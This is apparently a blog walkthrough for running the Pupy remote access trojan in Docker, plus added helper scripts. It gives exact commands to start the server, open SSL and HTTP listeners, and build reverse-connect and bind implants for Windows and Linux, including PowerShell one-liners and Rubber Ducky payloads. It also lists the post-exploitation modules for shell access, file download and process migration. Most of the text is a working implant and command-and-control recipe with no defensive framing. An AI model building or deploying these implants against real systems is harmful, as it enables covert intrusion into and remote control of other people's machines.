Use Pupy RAT On Docker

Pupy Remote Administration Tool

Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool, written mainly in Python.


Pull

docker pull alxchk/pupy:unstable

Deploy

Generate an SSH key pair (the operator logs in to the container over SSH with it)

ssh-keygen -f pupy

Create the pupy project directory (it holds generated payloads, keys, etc.)

mkdir -p /tmp/pupy

docker run

docker run -d -p 2022:22 -v /tmp/pupy:/projects alxchk/pupy:unstable

Copy the generated SSH public key (the .pub file, not the private key) to /tmp/pupy/keys/authorized_keys

cp pupy.pub /tmp/pupy/keys/authorized_keys

Log in to Pupy

ssh pupy@127.0.0.1 -p 2022 -i pupy
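The five deploy steps above as one script, added here as an example; it is not from the original post or the Pupy project. It keeps the image and paths the post uses and makes two changes worth having: the SSH port is published on 127.0.0.1 only (a plain -p 2022:22 binds the operator shell on every host interface), and the ports your listeners will use are published as well, because otherwise nothing outside the docker host can reach a listener started inside the container. The container name pupy, the ed25519 key path under ~/.ssh and the listener ports 443 and 8080 are assumptions, not values from the post.

```shell
#!/bin/sh
# Added example, not from the original post or the Pupy project.
# Assumed (not from the page): container name "pupy", key at ~/.ssh/pupy_ed25519,
# listener ports 443 and 8080. Override with the PUPY_* environment variables.
set -eu

PROJECT_DIR="${PUPY_PROJECT_DIR:-/tmp/pupy}"
KEY="${PUPY_SSH_KEY:-${HOME:-.}/.ssh/pupy_ed25519}"
IMAGE="alxchk/pupy:unstable"
LISTENER_PORTS="${PUPY_LISTENER_PORTS:-443 8080}"

# Create the operator key once. Keep it outside the project directory: that
# directory is mounted into the container as /projects.
gen_ssh_key() {
    key="$1"
    [ -f "$key" ] && return 0
    mkdir -p "$(dirname "$key")"
    ssh-keygen -t ed25519 -N '' -f "$key"
}

# Install the *public* key as the container's authorized_keys. Refuse anything
# that is not an OpenSSH public-key line, so typing `cp pupy` instead of
# `cp pupy.pub` cannot silently drop the private key into the shared volume.
install_authorized_key() {
    pub="$1"; proj="$2"
    if grep -q 'PRIVATE KEY' "$pub" || ! grep -Eq '^(ssh|ecdsa|sk)-' "$pub"; then
        echo "refusing: $pub does not look like an OpenSSH public key" >&2
        return 1
    fi
    mkdir -p "$proj/keys"
    cp "$pub" "$proj/keys/authorized_keys"
    # sshd StrictModes rejects group/world-writable authorized_keys files
    chmod 644 "$proj/keys/authorized_keys"
}

# SSH published on loopback only; every listener port published host:container.
start_container() {
    proj="$1"
    set -- -d --name pupy -p 127.0.0.1:2022:22
    for p in $LISTENER_PORTS; do set -- "$@" -p "$p:$p"; done
    docker run "$@" -v "$proj:/projects" "$IMAGE"
}

deploy() {
    gen_ssh_key "$KEY"
    install_authorized_key "$KEY.pub" "$PROJECT_DIR"
    start_container "$PROJECT_DIR"
    echo "connect with: ssh -i $KEY -p 2022 pupy@127.0.0.1"
}

# Run as `sh deploy.sh deploy`; sourcing the file only defines the functions.
if [ "${1:-}" = "deploy" ]; then deploy; fi
```

If you later add a listener on a port that was not published at start, the container has to be recreated with the extra -p mapping; docker does not let you publish ports on a running container.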

Basic Usage

Check the container's configuration (its bridge IP, published ports, etc.)

docker inspect container_name

The window you land in after logging in is a Tmux session; the default prefix key is C-b.


Generate a payload

gen -f client -O linux -A x64 connect -c 172.17.0.2:8080

172.17.0.2 is the container's address on the default docker bridge (the value docker inspect reports), so a payload built with it can only call back from the docker host itself. For a real target, pass an address the target can reach and a port that was published with -p when the container was started.

List sessions

sessions

Listeners: listen

listen -a ssl 443
listen -a http 4444

listen -L

listen -a adds a listener for the given transport on the given port; listen -L lists the listeners currently running.


Payload

gen -f <format> <launcher> -t <transport>

Command

[-f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}]
[-O {android,windows,linux,solaris}] [-A {x86,x64,armhf}]
[-U] [-P PACKER] [-S] [-o OUTPUT]
[-d <ATTEMPTS> <MIN SEC> <MAX SEC>] [-D OUTPUT_DIR]
[-s SCRIPTLET] [-l] [-E] [--no-use-proxy]
[--oneliner-nothidden] [--debug-scriptlets] [--debug]
[--workdir WORKDIR]
[{bind,auto_proxy,dnscnc,connect}] ...

format

client, py, pyinst, py_oneliner, ps1, ps1_oneliner, rubber_ducky, csharp, .NET, .NET_oneliner

client: a native executable to run on the target (.exe, .dll, .lin, .so).


Launcher, i.e. how the payload connects (bind, reverse connect, DNS, etc.)

bind, auto_proxy, dnscnc, connect

Generate

gen -f client -O windows -A x64 connect -c 10.1.1.12:443 -t http

gen -f ps1 -O windows -A x86 bind --host 10.1.1.12 --port 8080

The format is always given with -f, as in the synopsis above; the launcher (connect, bind, ...) is the positional argument, and its own options (-c, -t, --host, --port) follow it.
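An added check that ties the listen and gen steps above together (example code, not from the post or the Pupy project): the address given to connect -c must be one the target can reach, and a listener started inside the container is only reachable through a port that docker published on the host. This function reads the mapping in the format docker port <container> prints (PRIVATE/PROTO -> HOSTIP:HOSTPORT) and turns a listener's container port into the host:port to pass to -c, refusing ports that are unpublished or bound to loopback only. The sample mapping is constructed; the container name pupy and the external address 203.0.113.10 are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post or the Pupy project.
# Assumed: container name "pupy", external address 203.0.113.10.
set -eu

# Arguments: the output of `docker port <container>`, the container-side port a
# listener runs on (e.g. 443 for `listen -a ssl 443`), and the host address the
# implant should dial. Prints HOST:PORT for `connect -c`, or fails when the port
# is not published on 0.0.0.0 (unpublished, or loopback-only like the SSH port).
callback_target() {
    port_map="$1"; cport="$2"; host="$3"
    hostport=$(printf '%s\n' "$port_map" | awk -v want="$cport/tcp" '
        $1 == want && $3 ~ /^0\.0\.0\.0:/ { sub(/.*:/, "", $3); print $3; exit }')
    if [ -z "$hostport" ]; then
        echo "port $cport/tcp is not published on 0.0.0.0; an implant cannot reach it" >&2
        return 1
    fi
    printf '%s:%s\n' "$host" "$hostport"
}

# Constructed sample of `docker port pupy` for a container started with
# -p 127.0.0.1:2022:22 -p 443:443; port 8080 was deliberately not published.
SAMPLE_PORT_MAP='22/tcp -> 127.0.0.1:2022
443/tcp -> 0.0.0.0:443'

# Live use: callback_target "$(docker port pupy)" 443 203.0.113.10
callback_target "$SAMPLE_PORT_MAP" 443 203.0.113.10    # -> 203.0.113.10:443
callback_target "$SAMPLE_PORT_MAP" 8080 203.0.113.10 \
    || echo "recreate the container with -p 8080:8080 before using listen -a http 8080"
```

Run it against the real container once per listener before generating payloads; a listener that shows up in listen -L but fails this check will never receive a session from outside the docker host.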



Base Command

Command

{ COMMANDS }
COMMAND    DESCRIPTION
-----------------------------------------------------------------------
dnscnc     DNSCNC control
jobs       Manage Jobs
help       Show help
exposed    list exposed objects/methods
python     Start the local python interpreter (for debugging purposes)
sessions   list/interact with established sessions
restart    Restart pupysh
tag        Assign tag to current session
exit       Exit Shell
connect    Connect to the bind payload
run        Run a module on one or multiple clients
logging    Show/set log level
config     Work with configuration file
gen        Generate payload
creds      Credentials manager
listen     start/stop/show current listeners

ALIASED MODULES

{ ALIASED MODULES }
MODULE     DESCRIPTION
------------------------------------------------------------
getpid     list process information
exit       exit the client on the other side
getppid    list parent process information
cd         change directory
alive      request to send keepalive packets on rpyc level
rm         remove a file or a directory
netstat    list terminal sessions
last       list terminal sessions
w          list terminal sessions
date       Get current date
cp         copy file or directory
ps         list processes
mkdir      create an empty directory
forward    Local/remote port forwarding and SOCKS proxy
ls         list system files
cat        show contents of a file
mv         move file or directory
ip         list interfaces
http       Trivial Get/Post requests via HTTP protocol
getuid     get username
pwd        Get current working dir

Aliases

{ ALIASES }
ALIAS      COMMAND
----------------------------
info       get_info
pyexec     pyexec
exec       shell_exec
ps         ps
migrate    migrate
shell      interactive_shell
kill       process_kill
mount      drives
du         download -S

Unless otherwise stated, all posts on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting.